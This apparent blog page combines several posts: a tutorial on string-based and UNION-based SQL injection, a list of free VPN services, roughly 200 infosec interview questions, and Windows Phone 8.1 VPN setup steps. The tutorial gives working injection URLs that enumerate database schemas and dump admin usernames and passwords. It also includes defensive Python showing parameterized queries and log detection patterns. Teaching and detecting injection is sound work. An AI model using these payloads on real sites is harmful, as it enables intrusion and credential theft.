
09 July 2014

String Based SQL injection

What is String Based SQL injection, and how do you notice it?
To keep this simple: String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show the results we expect after our SQLi query runs. This usually means the parameter sits inside a quoted string in the site's SQL statement, so anything appended to it is read as part of that string until the quote is closed.
Common signs that a site is vulnerable to String Based injection are:

Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site shows a normal page even though it is vulnerable to SQLi)



Solution to this issue when hacking a site with String Based SQL injection
The answer to this problem is to use the following format when trying to hack a site with SQLi:
Code:
http://site.com/index.php?id=10' order by 1000--+
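That will show us the error, so the page now responds according to our query.
The point here is that we used the quote ' and the + sign in our query: the quote closes the string the site wraps around the id value, and --+ comments out the rest of the original statement (the + is a URL-encoded space, which MySQL requires after --).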
Code:
id=X' order by--+
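
Seen from the defending side, the behaviour described above comes from pasting the request value inside a quoted SQL literal. The following is an added example, not code from the original post: it uses Python's built-in sqlite3 as a stand-in for the site's database, and the `articles` table and function names are assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id TEXT, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES ('10', 'Hello', 'First post')")
    return db

def fetch_vulnerable(db, raw_id):
    """Vulnerable pattern: the request value is pasted inside a quoted literal."""
    sql = "SELECT id, title, body FROM articles WHERE id = '" + raw_id + "'"
    try:
        return "rows", db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the database error is what turns the page into an oracle.
        return "sql-error", str(exc)

def fetch_parameterized(db, raw_id):
    """Hardened pattern: the value is bound, so it can never become SQL syntax."""
    sql = "SELECT id, title, body FROM articles WHERE id = ?"
    return "rows", db.execute(sql, (raw_id,)).fetchall()

# Request values as the server sees them after URL decoding ("+" is a space).
SAMPLES = {
    "normal": "10",
    "no quote": "10 order by 100-- ",
    "quote, in range": "10' order by 3-- ",
    "quote, out of range": "10' order by 1000-- ",
}

def compare():
    """Run every sample through both query styles and collect the outcomes."""
    db = make_db()
    out = {}
    for label, value in SAMPLES.items():
        out[label] = {
            "vulnerable": fetch_vulnerable(db, value),
            "parameterized": fetch_parameterized(db, value),
        }
    return out

if __name__ == "__main__":
    for label, result in compare().items():
        print(label, result)
```

Without the quote the keywords stay inside the string and the page shows no error; with the quote the concatenated query changes shape, while the bound parameter treats every sample as plain data.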

Alright, now that you've got the point, let's try String Based on some of the other types of SQL injection, shall we?


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
The result shows an error, so we'll assume there are 10 columns for the purposes of this example.

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
The results will display the databases on the website.
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4. Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5. Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can also be done with Error Based SQL injection, Blind Based and other types of SQL injection.
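
The requests in the steps above leave a recognisable trail in web server access logs. The following is an added example, not part of the original post: a small log triage script whose rule names, log format (combined log format) and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns for the request shapes shown in this post (matched after URL decoding).
RULES = {
    "quote-then-order-by": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "quote-then-comment": re.compile(r"'[^']*(?:--|#)\s*$"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enumeration": re.compile(
        r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return (client, sorted rule names) for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None, []
    client, target = m.groups()
    hits = set()
    # parse_qsl decodes %XX and turns "+" into a space, like the server does.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    return client, sorted(hits)

def triage(lines):
    """Group rule hits per client so repeated probing stands out."""
    report = {}
    for line in lines:
        client, hits = inspect_line(line)
        if hits:
            report.setdefault(client, []).append(hits)
    return report

# Constructed access-log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jul/2014:10:00:01 +0000] "GET /index.php?id=10 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Jul/2014:10:00:05 +0000] '
    '"GET /index.php?id=10\'%20order%20by%201000--+ HTTP/1.1" 500 312',
    '198.51.100.7 - - [09/Jul/2014:10:00:09 +0000] '
    '"GET /index.php?id=-234\'%20UNION%20SELECT%201,2,3,4,5,group_concat(schema_name,0x0a),'
    '7,8,9,10%20from%20information_schema.schemata--+ HTTP/1.1" 200 6001',
    '192.0.2.44 - - [09/Jul/2014:10:01:00 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, hits in triage(SAMPLE_LOG).items():
        print(client, hits)
```

Pattern matching like this is a triage aid for finding probing in logs; the fix for the underlying flaw is binding parameters instead of concatenating them into the query.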

Top 10 Free VPN Services!!!



First of all, let's talk about what a VPN is.
VPN simply means “Virtual Private Network”. Basically, it’s a private network which lets users connect to other users or remote sites using a public network, usually the Internet. It uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee instead of physical connections. In short, it is a private network constructed within a public network infrastructure, such as the global Internet.
Why You Need VPN

To protect privacy, either on a LAN or a public hotspot.
Anonymous Internet surfing: full anonymity by hiding your real IP address.
Bypass geographical blocks from certain websites.
Unlike a proxy, you get a secured connection for all programs you are using.
Quality network ensures your VPN service will be fast wherever you are in the world.
Protection against your ISP.
Bypass ISP blocking for VOIP applications like Skype.

Top 10 Free VPN Services
1. UltraVPN
(https://www.ultravpn.fr/) It is a free client/server SSL VPN solution based on OpenVPN. It encrypts and anonymizes your network connection, making your connection safe and secure. You need to download and install the client and create a username and password to use this service.
2. Logmein Hamachi
( https://secure.logmein.com/products/hamachi2/download.aspx )
It’s a great free VPN service from the well-known guys behind the Logmein service for remote apps management. It’s free for non-commercial and personal use. Features:
No hardware required – A quick, simple and easy-to-use VPN that just works
Secure communications – Encrypted tunneling across public and private networks
Flexible networking – Combines the ease of an SSL VPN with the connectivity of an IP-sec VPN
Web-based management – Deploy to anyone, manage from anywhere, access anytime
Free for non-commercial usage – Absolutely free for non-commercial use
3. Packetix
(http://www.packetix.net/en/)
It's a Japanese free VPN solution with technology developed by SoftEther Corporation. You can use the PacketiX.NET online test service for free. Here’s what you can do with this service: you can create your private Virtual VPN Hub, and you can configure and use the hub for free. You can use all functions the PacketiX VPN software has to offer, such as creating a remote connection to your home network or uniting local networks at different sites. With this system, you won’t need to set up a VPN server with a global IP address yourself. The VPN server administration is done over an easy web interface.
4. Open VPN
( http://openvpn.net/index.php/opensource/downloads.html )
OpenVPN drives UltraVPN. OpenVPN is an SSL/TLS-based VPN that provides high security and privacy. The biggest difference between PPTP VPN and OpenVPN is that you need to install the OpenVPN client software to use the OpenVPN service, and OpenVPN does NOT work on mobile devices such as iPhone, iPad, Windows Mobile and Android. But OpenVPN works on Windows, Mac and Linux.
5. Your Freedom
( http://www.your-freedom.net/index.php?id=downloads )
This one is basically not a VPN service, but it performs almost the same function with great ease, hence I included it in this list. It provides both a free and a paid service. The free service is limited to six hours of usage per day (up to 18 hours per week). You need to install a client on your system and have a user name and password to use this.
6. Macro VPN
(http://www.macrovpn.com/)
Just like other services, MacroVPN offers a free VPN service for users. It provides a 128-bit PPTP encrypted VPN connection service and protection on Wi-Fi hotspots. It normally assigns US-based IPs.
7. Hotspot Shield
( http://hotspotshield.com/?lg=en)
Hotspot Shield is a free VPN service which protects your entire web surfing session, securing your connection on both your home Internet network and public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Here also, you need to download and install a client to use it on your computer.
8. Its Hidden
(http://itshidden.com/)
Itshidden is part of the Port 80 Limited (Seychelles) company, providing both free and paid VPN services. It creates a secure connection, encrypting all the data, protecting your privacy and securing you. You don't need to install any software. ItsHidden.com works on all platforms including Windows, Mac, Linux, iPhone, etc.
9. CyberGhost
(http://cyberghostvpn.com/)
This is a free VPN service from Germany which routes you through a German IP. The free service is limited to 10GB of traffic every month, which is more than enough for surfing websites, chatting and email.
10. Gpass
( http://gpass1.com/gpass/)
This is another free VPN service product of the World’s Gate, Inc which offers Internet solutions for information freedom in China and other regions. You need to install a software client to use this.

30 June 2014

infosec interview questions

1) What do you see as the most critical and current threats affecting Internet accessible websites?
2) What online resources do you use to keep abreast of web security issues?
3) Give an example of recent security vulnerability or threat?
4) Difference between a threat, vulnerability and risk?
5) What do you see as challenges to successfully deploying/monitoring web intrusion detection?
6) Definition of XSS and its impact on servers and clients?
7) What are the important steps you would recommend to secure a new web application and web server?
8) What is DOM based XSS?
9) What is Blind SQL injection?
10) Where do you get security news from?
11) If you had to both encrypt and compress data during transmission, which would you do first, and why?
12) Difference between HTTP and HTML?
13) Difference between stored and reflected XSS?
14) Common defenses against XSS?
15) Difference between Stateful and Stateless firewall?
16) What kind of network do you have at home?
17) What port does ping work?
18) Explain CSRF?
19) How to defend against CSRF?
20) Difference between XSS and CSRF?
21) As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities?
22) What are Linux’s strengths and weaknesses vs. Windows?
23) What’s the difference between Diffie-Hellman and RSA?
24) What kind of attack is a standard Diffie-Hellman exchange vulnerable to? 
25) What’s the goal of information security within an organization?
26) Are open-source projects more or less secure than proprietary ones?
27) What’s the difference between encoding, encryption, and hashing?
28) What is salting?
29) Who do you look up to within the field of Information Security? Why?
30) What is NMAP? Show some nmap commands (avoid firewall/IDS, no ping, etc.).
31) What is Key Escrow?
32) What is nonce?
33) What does RSA stand for?
34) What is DES?
35) What is triple DES?
36) What is the difference between Symmetric and Asymmetric?
37) How does HTTP handle state?
38) In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which?
39) How exactly does traceroute/tracert work at the protocol level?
40) What is a Buffer Overflow?
41) What is a NOP Sled?
42) Design a secure network
43) How do you securely link two offices together?
44) What is the security threat level today at the Internet Storm Center (ISC)?
45) What is SSL?
46) How do you create SSL certificates, generically speaking?
47) What is DNS Hijacking?
48) What is the latest security breach you’re aware of?
49) Have you hacked any system?
50) Can a Virtual Operating System be compromised?
51) What is UPX?
52) What is meterpreter?
53) What is LDAP?
54) Why is LDAP called Light weight?
55) What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog?
56) What are rainbow tables?
57) What is dsniff?
58) Other than Wireshark, what sniffers have you used?
59) What was the last course you attended? Where? When? Why?
60) What was the last technical book you read?
61) Describe the last security implementation you were involved with.
62) What is a honeypot?
63) Are there limitations of Intrusion Detection Signatures?
64) Describe TCP 3-way Handshake?
65) Difference between pen testing and vulnerability assessment?
66) Difference between vulnerability and mitigation?
67) Give me an example of a vulnerability at each layer of the OSI reference model.
68) Give me a type of mitigation for each of the vulnerabilities you have just provided.
69) OSI(Open System Interconnection) model
70) What is MITM?
71) What is a Syn Flood attack, and how to prevent it?
72) What’s the difference between a router, a bridge, a hub and a switch?
73) Your network has been infected by malware. Please walk me through the process of cleaning up the environment.
74) What’s the difference between a Proxy and a Firewall?
75) Why should I use server certificates on my e-commerce website?

76) What’s port scanning and how does it work?
77) Process of pen testing a system
78) What is NAT and how does it work?
79) What is false positive and false negative?
80) Please detail 802.1x security vs. 802.11 security
81) How would you harden a Windows Server? What about a Linux Server?
82) What are the latest threats you foresee for the near future?
83) What is ISO 27001 and why should a company adopt it?
84) What is the Microsoft Baseline Security Analyzer?
85) Define Security 
86) MAC OS vs. WINDOWS
87) Ping uses TCP or UDP?
88) Explain Authentication and authorization?
89) What is a Brute force attack?
90) What is meant by client-side scripting?
91) What is a cookie?
92) Explain DOS, DDOS
93) What is directory traversal attack?
94) What is meant by reconnaissance?
95) What is forced browsing?
96) What is meant by session ID?
97) Define Web application?
98) What is meant by WAF?
99) Explain different types of hackers?
100) What are the different types of penetration testing?
101) Explain CIA triad
102) What are Google hacks/dorks?
103) List out OWASP top 10
104) Define Hacking? What is ethical hacking?
105) What are the various penetration testing methodologies?
106) What is social engineering?
107) In the context of Metasploit, explain what is meant by exploit, payload, auxiliary, encoders, NOP, post
108) What are root kits?
109) Explain Steganography
110) Difference between autopwn and armitage
111) What is meant by backdooring?
112) What is INCIDENT RESPONSE?
113) What is chain of custody?
114) What are the different ports used commonly? List out their port numbers.
115) What is imaging?
116) What is padding?
117) What is pivoting?
118) What is SSH, FTP, TLS?
119) What is HTTP response splitting?
120) What is RFI, LFI?
121) What do you know about encryption?
122) Can CSRF be done for POST and GET methods?
123) What is the encryption of ssl certificate in a website?
124) Difference between public and private key?
125) What is chain of custody?
126) What is meant by incident response?
127) What is hacktivism?
128) What is a firewall? Types of firewall?
129) What is ssl, how do you create ssl certificates?
130) What is a spoofed packet?
131) What is IDS or IDP? Give example?
132) What would you do if your system is compromised?
133) What is web-caching?
134) What is use of proxy servers?
135) What would you do if your network device is compromised?
136) What is GPG/PGP?
137) What is log host?
138) How do you manage a firewall?
139) If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
140) Why do we use a firewall for security when we have facilities like access lists on routers?
141) What is the difference between an SSL connection and an SSL session?
142) List and briefly define four techniques used to avoid guessable passwords.
143) What is a salt in the context of UNIX password management?
144) What is the difference between rule-based anomaly detection and rule-based penetration identification?
145) What is the difference between statistical anomaly detection and rule-based intrusion detection?
146) Describe SOAP and WSDL
147) What protocols comprise SSL?
148) What are hidden fields in HTTP?
149) What steps are involved in the SSL Record Protocol transmission?
150) What is file enumeration?
151) What tools can you use to validate the strength of SID (session ID)?
152) What is phishing attack?
153) What is cookie gathering?
154) What is a dual signature and what is its purpose?
155) How can you ensure that all input fields are properly validated to prevent code injection attacks?
156) Why do we need port scanning?
157) What are format string vulnerabilities?
158) Example of broken authentication and command injection
159) What is sql injection?
160) What are fuzzers?
161) What is runtime inspection?
162) What is ISO 17799?
163) What is integer overflow?
164) What type of security testing have you performed?
165) What is ARP spoofing?
166) During an audit, an interviewee is not disclosing the information being requested. How would you overcome this situation?
167) Why should I use server certificates on my e-commerce website?
168) Can a server certificate prevent SQL injection attacks against your system? Please explain.
169) What are the most common application security flaws?
170) What do you understand by layered security approach?
171) Difference between virus, Trojan, spyware, malware and a worm
172) Can Linux be compromised? How secure is Linux? How would you compromise a LINUX system?
173) What do you do if you are a victim of a DoS attack?
174) What is a log host?
175) What are the security functions of SSL?
176) What is a 0 by 90 bytes error?
177) What is the problem of having a predictable sequence of bits in TCP/IP?
178) What is heap memory?
179) What is a system call?
180) What is 2 factor authentication?
181) What is IIS lockdown tool?
182) What is disaster recovery?
183) What is a null session?
184) What is incident management?
185) What is SAM (Security Account Manager)?
186) What is a SID (Security ID)?
187) What is the difference between TCP and IP?
188) What is the difference between TCP and UDP?
189) Explain IP Address?
190) What is Public IP and Private IP?
191) Define subnet mask, default gateway, loopback address and IPID?
192) What is Hypertext Transfer Protocol (HTTP)? What are request methods?
193) Difference between IPv4 and IPv6
194) What is the difference between stateful and stateless protocol? Explain with example?
195) How would you prevent man-in-the-middle attacks?
196) Example, recommendation and effect of DOM based XSS?
197) What is XSP (Cross site printing)?
198) Describe OSPF routing?
199) What are the consequences of HTTP trace request?
200) What is session hijacking?
201) How would you convince a client to use your security product?
202) How do you secure a Wi-Fi network?
203) What is a protocol, socket and port?
204) What is your area of expertise and why?
205) What is the difference between routing protocols and routed protocols?
206) Difference between session and cookie?

How To Use VPN in Windows Phone 8.1

Use a VPN connection

At a coffee shop and need to get to a site on your company's intranet? Or using an app from your company at home? With virtual private networking (VPN), you can do these things from your Windows Phone—just as if you were in the office. VPN gives you a secure connection to your company's network, so you can send and receive private information using a Wi-Fi or cellular data connection.

To get a VPN profile on your phone

The first step is to get a VPN profile onto your phone. There are two ways to get one:
  • Set up a workplace account to automatically get a VPN profile from your company.
  • Create a VPN profile on your own. (You can learn how later in this topic.) When you do this, you'll need to contact your company's support person to get the VPN connection settings for your organization.

Note

VPN is only available on Windows Phone 8.1. Check to see which software version you have and find out if an update is available.

To connect to a VPN

Once you have a VPN profile on your phone, you're ready to connect.
  1. In the App list, tap Settings > VPN.
  2. Tap and hold the VPN profile name, and then tap Edit.
  3. In the User name and Password boxes, type your user name and password.
  4. To connect to the VPN, do one of the following, depending on what type of profile you're using:
    • If the VPN profile has Automatic listed under it, your phone will automatically connect to the VPN when you try to access information on your company's network.
    • If the VPN profile has Manual listed under it, tap the profile to connect to the VPN, and then use the app that accesses data on your company's network or visit a company intranet site.

Note

The icons at the top of your screen will show you when you're connected to the VPN. The VPN over Wi-Fi icon appears when you're connected over Wi-Fi, and the VPN over cellular data icon shows when you're connected over cellular data.

To create a VPN profile

If you don't have a VPN profile on your phone, you'll need to create one on your own. Before you start, contact your company's support person to get the VPN connection settings for your organization.
  1. In the App list, tap Settings > VPN.
  2. Set Status to On, and then tap Add.
  3. In the Server name or IP address box, type the server name or IP address of your VPN server.
  4. Tap Type and choose the type of VPN connection you want to create.
    If an SSL VPN app is required and you don't have one installed yet, tap the link to download one from the Store.
  5. Tap Connect using, and choose the method you want to use to connect.
  6. In the User name and Password boxes, type your user name and password.
  7. To automatically connect to the VPN when a company app or site requires it, set Connect automatically to On.
  8. For Send all traffic, do one of the following:
    • To have all data you send and receive go over the VPN, set Send all traffic to On.
    • To only have data that requires access to your company's network or intranet go over the VPN connection, set Send all traffic to Off, tap Domains and IP ranges, and then enter the domain names and IP ranges that are protected. Only data that's sent and received from those domains or IP addresses will go over the VPN connection. Other data that's sent or received won't go over the VPN.
  9. In the Profile name box, type a name for your profile.
  10. Tap Advanced, and then enter any additional settings you need to for your organization's VPN.
    You might need to contact your company's support person to get additional information, such as the Proxy settings and DNS suffix to use for your company's network.
  11. Press the Back button on your phone to go back to the Add profile screen, and then tap Save.